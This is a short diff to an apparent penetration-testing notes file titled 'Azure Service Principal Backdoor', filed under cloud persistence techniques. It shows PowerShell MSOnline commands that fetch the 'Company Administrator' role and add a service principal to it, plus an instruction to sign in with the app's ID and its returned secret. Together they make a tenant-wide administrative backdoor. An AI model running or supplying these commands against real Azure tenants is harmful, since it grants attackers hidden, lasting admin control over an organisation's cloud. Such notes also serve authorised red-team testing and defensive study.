H3llKa1ser/B00t2R00t/Cloud Penetration Testing/Microsoft  Azure/Persistence/Azure Service Principal Backdoor.md

  - $role = Get-MsolRole -RoleName "Company Administrator"

- - Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -
+ - Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId

- - RoleMemberObjectId $sp.ObjectId

 ### Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt